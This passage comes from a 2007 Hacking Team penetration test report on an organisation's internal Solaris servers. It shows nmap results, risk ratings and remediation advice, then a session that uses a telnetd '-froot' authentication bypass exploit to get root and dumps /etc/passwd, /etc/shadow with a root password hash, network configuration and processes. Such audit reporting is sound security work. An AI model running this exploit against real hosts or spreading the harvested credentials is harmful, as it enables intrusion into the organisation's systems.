32773/tcp open metad 1-2 (rpc #100229)
32774/tcp open metamhd 1 (rpc #100230)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open mdcommd 1 (rpc #100422)
32778/tcp open status 1 (rpc #100024)
32786/tcp open dmispd 1 (rpc #300598)
Uptime: 238.135 days (since Wed Nov 22 01:59:22 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=156 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: milsunats-inet, milsunats-inet.mtsgroup.org; OSs: Solaris,
Unix
It was possible to login to the VNC service reusing a VNC password found on another compromised system
leading to local privilege escalation and full system compromise.
6.3.5 192.168.254.60, 192.168.254.151, 192.168.254.153, 192.168.254.180, 192.168.254.182,
192.168.254.184 [Compromised]
Rating: unsafe
Vulnerabilities found: V5, V6, for 192.168.254.180, 192.168.254.182 and 192.168.254.184 also V4
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates; disable the cleartext telnet/ftp services or replace them with
telnets/ssh/ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Netra T1 105
Hostname MTSAPPSRV01 MTSMYSQLDATA1, MTSMYSQLAPI1,
MTSDFEEDAS3, MTSVADDSAS1
Compromised Compromised Directly Info Telnet calling login -f
Auth -froot
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 67 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open status 1 (rpc #100024)
32772/tcp open metad 1-2 (rpc #100229)
32773/tcp open rusersd 2-3 (rpc #100002)
32776/tcp open ttdbserverd 1 (rpc #100083)
32778/tcp open sometimes-rpc19?
32779/tcp open sometimes-rpc21?
32780/tcp open sometimes-rpc23?
Uptime: 241.395 days (since Sat Nov 18 19:48:54 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=155 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsappsrv01, mtsappsrv01.; OSs: Solaris, Unix
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
180
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
111/tcp open rpcbind 2-4 (rpc #100000)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 68 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4045/tcp open nlockmgr 1-4 (rpc #100021)
32786/tcp open status 1 (rpc #100024)
32787/tcp open dmispd 1 (rpc #300598)
Uptime: 241.409 days (since Sat Nov 18 19:48:54 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Host: dfeedas1; OS: Solaris
The TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Ftpd is a cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
182
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
Uptime: 241.411 days (since Sat Nov 18 19:48:54 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdfeedas3, mtsdfeedas3.mtsgroup.org; OSs: Solaris, Unix
The TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing them with
their cryptographic counterparts.© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 69 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
184
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
Uptime: 241.412 days (since Sat Nov 18 19:48:54 2006)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsvaddsas1, mtsvaddsas1.mtsgroup.org; OSs: Solaris, Unix
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing them with
their cryptographic counterparts.
The host 192.168.254.60 has an outdated Solaris version, the supplied telnetd server calls login with
unescaped arguments allowing a remote user to login with any user, root included, without supplying a valid
password:
$ ./scan 192.168.254.60 root
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.60...
Connected to 192.168.254.60.
Escape character is '^]'.
Last login: Fri Jul 13 18:27:57 from lmeneghesso.mts
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
root@mtsappsrv01 # w© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 70 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
5:05pm up 241 day(s), 21:52, 1 user, load average: 0.12, 0.12, 0.10
User tty login@ idle JCPU PCPU what
root pts/1 5:05pm w
root@mtsappsrv01 # ls
bin etc lib opt sbin var
cdrom export lost+found platform system vol
dev home mnt proc tmp zones
devices kernel net rmdisk usr
root@mtsappsrv01 # id
uid=0(root) gid=0(root)
root@mtsappsrv01 # uptime
5:07pm up 241 day(s), 21:53, 1 user, load average: 0.14, 0.12, 0.11
root@mtsappsrv01 # prtconf -D|grep net
network, instance #0 (driver name: ipge)
network, instance #1 (driver name: ipge)
network, instance #2 (driver name: ipge)
network, instance #3 (driver name: ipge)
root@mtsappsrv01 # /sbin/ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index
1
inet 127.0.0.1 netmask ff000000
lo0:1: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 ind
ex 1
zone dfeedas1
inet 127.0.0.1 netmask ff000000
lo0:2: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 ind
ex 1
zone vaddsas1
inet 127.0.0.1 netmask ff000000
lo0:3: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 ind
ex 1
zone dfeedas3
inet 127.0.0.1 netmask ff000000
lo0:4: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 ind
ex 1
zone mysqldata1
inet 127.0.0.1 netmask ff000000
lo0:5: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 ind
ex 1
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 71 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
zone mysqlapi1
inet 127.0.0.1 netmask ff000000
ipge0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
inet 192.168.254.60 netmask ffffff00 broadcast 192.168.254.255
ether 0:14:4f:2d:75:50
ipge1: flags=1000842<BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 3
inet 0.0.0.0 netmask 0
ether 0:14:4f:2d:75:51
ipge1:1: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 3
zone dfeedas1
inet 192.168.254.180 netmask ffffff00 broadcast 192.168.254.255
ipge2: flags=1000842<BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 4
inet 0.0.0.0 netmask 0
ether 0:14:4f:2d:75:52
ipge2:1: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 4
zone vaddsas1
inet 192.168.254.184 netmask ffffff00 broadcast 192.168.254.255
ipge2:2: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 4
zone dfeedas3
inet 192.168.254.182 netmask ffffff00 broadcast 192.168.254.255
ipge2:3: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 4
zone mysqlapi1
inet 192.168.254.153 netmask ffffff00 broadcast 192.168.254.255
ipge3: flags=1000842<BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 5
inet 0.0.0.0 netmask 0
ether 0:14:4f:2d:75:53
ipge3:1: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 5
zone mysqldata1
inet 192.168.254.151 netmask ffffff00 broadcast 192.168.254.255
root@mtsappsrv01 # cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 72 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
root@mtsappsrv01 # cat /etc/shadow
root:$2a$04$y7MruMDVW8Z7c.QK1zADyOcNxFgI8zAEcZLkGRup/TGWb8njA.gtC:13369::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
webservd:*LK*:::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
root@mtsappsrv01 # cat /etc/security/crypt.conf
#
# Copyright 2002 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
#ident "@(#)crypt.conf 1.1 02/06/07 SMI"
#
# The algorithm name __unix__ is reserved.
1 crypt_bsdmd5.so.1
2a crypt_bsdbf.so.1
md5 crypt_sunmd5.so.1
CRYPT_DEFAULT=2a
root@mtsappsrv01 # ps -ef
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 Nov 18 ? 0:18 sched
root 1 0 0 Nov 18 ? 1:06 /sbin/init
root 2 0 0 Nov 18 ? 0:00 pageout
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 73 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 3 0 0 Nov 18 ? 461:17 fsflush
root 116 1 0 Nov 18 ? 0:01 devfsadmd
root 7 1 0 Nov 18 ? 5:12 /lib/svc/bin/svc.startd
root 9 1 0 Nov 18 ? 5:06 /lib/svc/bin/svc.configd
root 338 1 0 Nov 18 ? 0:27 /usr/sbin/syslogd
daemon 22225 1 0 Jun 08 ? 0:00 /usr/lib/nfs/lockd
root 102 1 0 Nov 18 ? 0:00 /usr/lib/sysevent/syseventd
daemon 17467 1 0 Jun 08 ? 0:01 /usr/lib/crypto/kcfd
root 129 1 0 Nov 18 ? 0:01 /usr/lib/picl/picld
root 346 238 0 Nov 18 ? 0:00 /usr/sbin/rpc.metad
root 218 1 0 Nov 18 ? 0:03 /usr/sbin/cron
daemon 132 1 0 Nov 18 ? 0:13 /usr/lib/crypto/kcfd
root 119 1 0 Nov 18 ? 16:58 /usr/sbin/nscd
daemon 225 1 0 Nov 18 ? 33:36 /usr/lib/nfs/nfsmapid
root 238 1 0 Nov 18 ? 5:05 /usr/lib/inet/inetd start
daemon 223 1 0 Nov 18 ? 0:00 /usr/sbin/rpcbind
daemon 230 1 0 Nov 18 ? 0:00 /usr/lib/nfs/lockd
daemon 228 1 0 Nov 18 ? 0:00 /usr/lib/nfs/statd
root 240 7 0 Nov 18 console 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T sun -m ldterm,ttcompat -h
root 316 1 0 Nov 18 ? 1:25 /usr/lib/autofs/automountd
root 234 7 0 Nov 18 ? 0:08 /usr/lib/saf/sac -t 300
root 239 1 0 Nov 18 ? 0:40 /usr/lib/utmpd
root 242 234 0 Nov 18 ? 0:08 /usr/lib/saf/ttymon
root 767 1 0 Nov 18 ? 5:16 /lib/svc/bin/svc.startd
root 364 1 0 Nov 18 ? 5:48 /usr/lib/fm/fmd/fmd
daemon 927 1 0 Nov 18 ? 0:00 /usr/sbin/rpcbind
root 972 724 0 Nov 18 zoneconsole 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T ansi -m ldterm,ttcompat -h
nobody 5363 1261 0 04:38:49 ? 0:00 /usr/openwin/bin/xfs
root 330 1 0 Nov 18 ? 0:00 /usr/sbin/mdmonitord
smmsp 362 1 0 Nov 18 ? 2:06 /usr/lib/sendmail -Ac -q15m
root 363 1 0 Nov 18 ? 11:16 /usr/lib/sendmail -bd -q15m
nobody 6939 1159 0 04:41:10 ? 0:00 /usr/openwin/bin/xfs
root 360 1 0 Nov 18 ? 0:00 /usr/lib/ssh/sshd
root 5376 1 0 04:38:55 ? 2:10 /usr/java/bin/java -Dviper
.fifo.path=/var/run/smc898/boot.fifo -Xmx128m -Dsun.s
root 727 1 0 Nov 18 ? 4:59 /lib/svc/bin/svc.configd
root 641 1 0 Nov 18 ? 0:00 zoneadmd -z dfeedas1
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 74 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 646 1 0 Nov 18 ? 0:00 zsched
root 746 1 0 Nov 18 ? 0:00 zsched
root 723 1 0 Nov 18 ? 0:00 zoneadmd -z vaddsas1
root 724 1 0 Nov 18 ? 5:16 /lib/svc/bin/svc.startd
root 1150 1149 0 Nov 18 ? 0:08 /usr/lib/saf/ttymon
root 719 646 0 Nov 18 ? 0:58 /sbin/init
root 513 1 0 Nov 18 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 726 1 0 Nov 18 ? 0:00 zsched
root 738 726 0 Nov 18 ? 1:00 /sbin/init
root 773 1 0 Nov 18 ? 5:12 /lib/svc/bin/svc.configd
root 742 1 0 Nov 18 ? 0:00 zoneadmd -z dfeedas3
root 743 1 0 Nov 18 ? 5:14 /lib/svc/bin/svc.startd
root 745 1 0 Nov 18 ? 4:58 /lib/svc/bin/svc.configd
root 764 746 0 Nov 18 ? 1:03 /sbin/init
root 868 1 0 Nov 18 ? 0:00 /usr/sbin/vold -f
/etc/vold.conf
root 804 1 0 Nov 18 ? 0:04 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
daemon 929 1 0 Nov 18 ? 0:00 /usr/lib/nfs/statd
root 818 1 0 Nov 18 ? 0:00 /usr/lib/dmi/dmispd
root 1163 1 0 Nov 18 ? 0:46 /usr/lib/utmpd
daemon 873 1 0 Nov 18 ? 101:34 /usr/lib/crypto/kcfd
root 819 1 0 Nov 18 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsappsrv01
root 923 1 0 Nov 18 ? 0:06 /usr/sbin/cron
root 880 1 0 Nov 18 ? 16:27 /usr/sbin/nscd
daemon 934 1 0 Nov 18 ? 0:00 /usr/lib/nfs/lockd
root 948 724 0 Nov 18 ? 0:08 /usr/lib/saf/sac -t 300
root 888 1 0 Nov 18 ? 4:55 /usr/sfw/sbin/snmpd
root 957 948 0 Nov 18 ? 0:08 /usr/lib/saf/ttymon
root 1056 1 0 Nov 18 ? 0:04 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
daemon 1145 1 0 Nov 18 ? 0:00 /usr/lib/nfs/lockd
root 950 1 0 Nov 18 ? 0:40 /usr/sbin/syslogd
root 953 1 0 Nov 18 ? 5:01 /usr/lib/inet/inetd start
root 1043 1 0 Nov 18 ? 16:28 /usr/sbin/nscd
root 961 1 0 Nov 18 ? 0:46 /usr/lib/utmpd
root 991 1 0 Nov 18 ? 5:34 /usr/lib/ssh/sshd
daemon 1029 1 0 Nov 18 ? 54:21 /usr/lib/crypto/kcfd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 75 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 1149 743 0 Nov 18 ? 0:08 /usr/lib/saf/sac -t 300
root 1126 1 0 Nov 18 ? 0:06 /usr/sbin/cron
root 1066 1 0 Nov 18 ? 0:00 /usr/lib/dmi/snmpXdmid -s
dfeedas1
daemon 1141 1 0 Nov 18 ? 0:00 /usr/lib/nfs/statd
root 1080 1 0 Nov 18 ? 6:05 /usr/sfw/sbin/snmpd
daemon 1136 1 0 Nov 18 ? 0:00 /usr/sbin/rpcbind
root 1266 1 0 Nov 18 ? 0:43 /usr/lib/utmpd
root 1234 1 0 Nov 18 ? 0:06 /usr/sbin/cron
root 1065 1 0 Nov 18 ? 0:00 /usr/lib/dmi/dmispd
root 1325 1 0 Nov 18 ? 1:24 /usr/lib/autofs/automountd
daemon 1248 1 0 Nov 18 ? 0:00 /usr/lib/nfs/statd
daemon 1243 1 0 Nov 18 ? 0:00 /usr/sbin/rpcbind
root 1265 1258 0 Nov 18 ? 0:08 /usr/lib/saf/ttymon
root 1159 1 0 Nov 18 ? 5:02 /usr/lib/inet/inetd start
root 1261 1 0 Nov 18 ? 5:09 /usr/lib/inet/inetd start
daemon 1254 1 0 Nov 18 ? 0:00 /usr/lib/nfs/lockd
root 1168 1 0 Nov 18 ? 17:00 /usr/sbin/nscd
daemon 1169 1 0 Nov 18 ? 101:38 /usr/lib/crypto/kcfd
root 1268 767 0 Nov 18 zoneconsole 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T vt100 -m ldterm,ttcompat -
root 1258 767 0 Nov 18 ? 0:08 /usr/lib/saf/sac -t 300
root 1176 743 0 Nov 18 zoneconsole 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T vt100 -m ldterm,ttcompat -
root 1507 1 0 Nov 18 ? 0:04 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
root 1334 1 0 Nov 18 ? 0:34 /usr/sbin/syslogd
root 1730 1 0 Nov 18 ? 0:04 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
root 1338 1 0 Nov 18 ? 2:56 /usr/lib/ssh/sshd
smmsp 1346 1 0 Nov 18 ? 2:03 /usr/lib/sendmail -Ac -q15m
root 1347 1 0 Nov 18 ? 11:34 /usr/lib/sendmail -bd -q15m
0000100 8687 1 0 06:00:01 ? 16:29 /opt/java/bin/java -Djava
.util.logging.manager=org.apache.juli.ClassLoaderLogMa
root 9897 9882 0 17:13:37 pts/1 0:00 ps -ef
root 1505 1 0 Nov 18 ? 1:20 /usr/lib/autofs/automountd
root 17679 17676 0 Jun 08 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
smmsp 1543 1 0 Nov 18 ? 2:01 /usr/lib/sendmail -Ac -q15m
root 1515 1 0 Nov 18 ? 0:00 /usr/lib/dmi/dmispd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 76 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
0000100 8657 1 0 06:00:01 ? 6:21 /opt/java/bin/java -Djava
.util.logging.manager=org.apache.juli.ClassLoaderLogMa
root 1516 1 0 Nov 18 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsvaddsas1
root 1406 1 0 Nov 18 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 1532 1 0 Nov 18 ? 0:39 /usr/sbin/syslogd
root 1525 1 0 Nov 18 ? 5:33 /usr/lib/ssh/sshd
root 1544 1 0 Nov 18 ? 11:33 /usr/lib/sendmail -bd -q15m
root 1536 1 0 Nov 18 ? 6:07 /usr/sfw/sbin/snmpd
0040000 8656 1 0 06:00:01 ? 32:47 /opt/java/bin/java -Djava
.util.logging.manager=org.apache.juli.ClassLoaderLogMa
root 1764 1 0 Nov 18 ? 6:02 /usr/sfw/sbin/snmpd
root 1743 1 0 Nov 18 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsdfeedas3
root 22942 1 0 Jun 08 ? 0:00 /usr/lib/ssh/sshd
root 16826 1 0 Jun 08 ? 0:01 zoneadmd -z mysqldata1
root 17678 17676 0 Jun 08 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 1593 1 0 Nov 18 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 17859 1 0 Jun 08 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsmysqldata1
root 17875 1 0 Jun 08 ? 1:03 /usr/sfw/sbin/snmpd
root 27674 1 0 Dec 05 ? 23:22 /usr/lib/inet/xntpd
root 1741 1 0 Nov 18 ? 0:00 /usr/lib/dmi/dmispd
root 17858 1 0 Jun 08 ? 0:00 /usr/lib/dmi/dmispd
root 22138 1 0 Jun 08 ? 1:06 /lib/svc/bin/svc.configd
root 17432 1 0 Jun 08 ? 0:58 /lib/svc/bin/svc.startd
0000100 2529 2509 0 Jun 11 ? 70:21
/opt/MTSWeb/MySQLCluster/libexec/mysqld --basedir=/opt/MTSWeb/MySQLCluster --da
daemon 17516 1 0 Jun 08 ? 0:00 /usr/sbin/rpcbind
root 17522 17432 0 Jun 08 ? 0:02 /usr/lib/saf/sac -t 300
root 17676 1 0 Jun 08 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 19626 17432 0 Jun 08 zoneconsole 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T vt100 -m ldterm,ttcompat -
root 22226 22136 0 Jun 08 ? 0:02 /usr/lib/saf/sac -t 300
root 9882 9838 0 17:12:17 pts/1 0:00 bash
root 22123 1 0 Jun 08 ? 0:00 zsched
root 17617 1 0 Jun 08 ? 0:05 /usr/sbin/syslogd
root 3758 238 0 04:14:48 ? 0:00 /usr/dt/bin/rpc.ttdbserverd
daemon 17518 1 0 Jun 08 ? 0:00 /usr/lib/nfs/statd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 77 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 17523 17522 0 Jun 08 ? 0:02 /usr/lib/saf/ttymon
root 17527 1 0 Jun 08 ? 0:07 /usr/lib/utmpd
root 17511 1 0 Jun 08 ? 0:00 /usr/sbin/cron
root 17472 1 0 Jun 08 ? 2:28 /usr/sbin/nscd
root 17430 17419 0 Jun 08 ? 0:10 /sbin/init
root 17419 1 0 Jun 08 ? 0:00 zsched
daemon 17521 1 0 Jun 08 ? 0:00 /usr/lib/nfs/lockd
root 17529 1 0 Jun 08 ? 0:53 /usr/lib/inet/inetd start
root 17434 1 0 Jun 08 ? 1:07 /lib/svc/bin/svc.configd
nobody 3747 238 0 04:14:42 ? 0:00 /usr/openwin/bin/xfs
root 9835 238 0 17:05:47 ? 0:00 /usr/sbin/in.telnetd
root 17692 1 0 Jun 08 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 21476 1 0 Jun 08 ? 0:01 zoneadmd -z mysqlapi1
root 2587 1 0 Jun 11 ? 0:00 /bin/sh
/opt/MTSWeb/MySQLCluster/bin/mysqld_Safe --user=mysql
root 17842 1 0 Jun 08 ? 0:01 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
root 22171 1 0 Jun 08 ? 2:37 /usr/sbin/nscd
root 22136 1 0 Jun 08 ? 0:59 /lib/svc/bin/svc.startd
root 22318 1 0 Jun 08 ? 0:05 /usr/sbin/syslogd
root 22134 22123 0 Jun 08 ? 0:11 /sbin/init
root 22965 1 0 Jun 08 ? 0:00 /usr/lib/ssh/sshd
daemon 22172 1 0 Jun 08 ? 0:01 /usr/lib/crypto/kcfd
root 22214 1 0 Jun 08 ? 0:00 /usr/sbin/cron
root 22657 22136 0 Jun 08 zoneconsole 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T vt100 -m ldterm,ttcompat -
daemon 22220 1 0 Jun 08 ? 0:00 /usr/sbin/rpcbind
root 22232 1 0 Jun 08 ? 0:53 /usr/lib/inet/inetd start
root 22227 22226 0 Jun 08 ? 0:02 /usr/lib/saf/ttymon
0000100 2607 2587 0 Jun 11 ? 70:21
/opt/MTSWeb/MySQLCluster/libexec/mysqld --basedir=/opt/MTSWeb/MySQLCluster --da
daemon 22222 1 0 Jun 08 ? 0:00 /usr/lib/nfs/statd
root 22233 1 0 Jun 08 ? 0:07 /usr/lib/utmpd
root 2509 1 0 Jun 11 ? 0:00 /bin/sh
/opt/MTSWeb/MySQLCluster/bin/mysqld_Safe --user=mysql
root 22549 1 0 Jun 08 ? 0:00 /usr/lib/dmi/dmispd
root 22381 22379 0 Jun 08 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 22382 22379 0 Jun 08 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 22379 1 0 Jun 08 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 78 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 22551 1 0 Jun 08 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtsmysqlapi1
root 3762 1 0 04:14:48 ? 2:11 /usr/java/bin/java -Dviper
.fifo.path=/var/run/smc898/boot.fifo -Xmx128m -Dsun.s
root 6952 1 0 04:41:16 ? 2:09 /usr/java/bin/java -Dviper
.fifo.path=/var/run/smc898/boot.fifo -Xmx128m -Dsun.s
root 22395 1 0 Jun 08 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 9838 9835 0 17:05:47 pts/1 0:00 -sh
root 22541 1 0 Jun 08 ? 0:01 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
root 22574 1 0 Jun 08 ? 1:03 /usr/sfw/sbin/snmpd
root@mtsappsrv01 # getent passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
root@mtsappsrv01 # /usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
root@mtsappsrv01 # cat /etc/release
